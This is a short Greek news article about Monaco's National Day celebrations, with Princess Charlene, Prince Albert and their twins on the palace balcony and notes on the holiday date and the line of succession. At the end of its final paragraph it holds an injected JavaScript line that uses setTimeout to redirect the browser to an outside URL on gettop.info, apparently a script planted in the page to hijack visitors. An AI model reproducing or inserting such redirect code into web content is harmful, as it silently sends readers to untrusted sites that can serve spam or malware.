Εθνική γιορτή στο Μονακό – Λαμπεροί εορτασμοί – Χαμόγελα για την πριγκιπική οικογένεια (ΒΙΝΤΕΟ)

0
66

 

Εθνική εορτή έχουν σήμερα στο Μονακό και το γιορτάζουν με λαμπρότητα και κάθε επισημότητα όπως κάθε χρόνο.

Φέτος, η πριγκίπισσα Σαρλίν έκλεψε τι εντυπώσεις με το λαμπερό της χαμόγελο ενώ εμφανίστηκε στο μπαλκόνι του ανακτόρου στο πλευρό του πρίγκιπα Αλβέρτου και κρατώντας στην αγκαλιά τα δίδυμά τους.

Πριν από τους εορτασμούς για την Εθνική Ημέρα, η 38χρονη πριγκίπισσα έδωσε το «παρών» σε εκδηλώσεις του Ερυθρού Σταυρού δίνοντας δώρα σε πρόσφυγες.

Συνήθως την ημέρα που γιορτάζουν στο πριγκιπάτο την εθνική τους γιορτή την επιλέγουν οι εκάστοτε πρίγκιπες και ορίζεται από τη γιορτή του αγίου από τον οποίο έχουν λάβει το όνομά τους . Ωστόσο, ο Αλβέρτος καθιέρωσε τη 19η Νοεμβρίου ως την Εθνική Ημέρα, όπως ακριβώς είχε κάνει και ο πατέρας του, αείμνηστος Ρενιέ Γ’.

Στο μπαλκόνι του ανακτόρου ήταν και τα δίδυμα πριγκίπισσα Γκαμπριέλα Τερέζα Μαρί και ο πρίγκιπας Ζακ Ονορέ Ρενιέ που στις 10 Δεκεμβρίου θα γίνουν 2 χρονών. Καθώς επιλέγονται κυρίως άρρενα μέλη της πριγκιπικής οικογένειας ως διάδοχοι, ο πρίγκιπας Ζακ είναι πρώτος στη διαδοχή στον θρόνο του πριγκιπάτου των Μονεγάσκων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here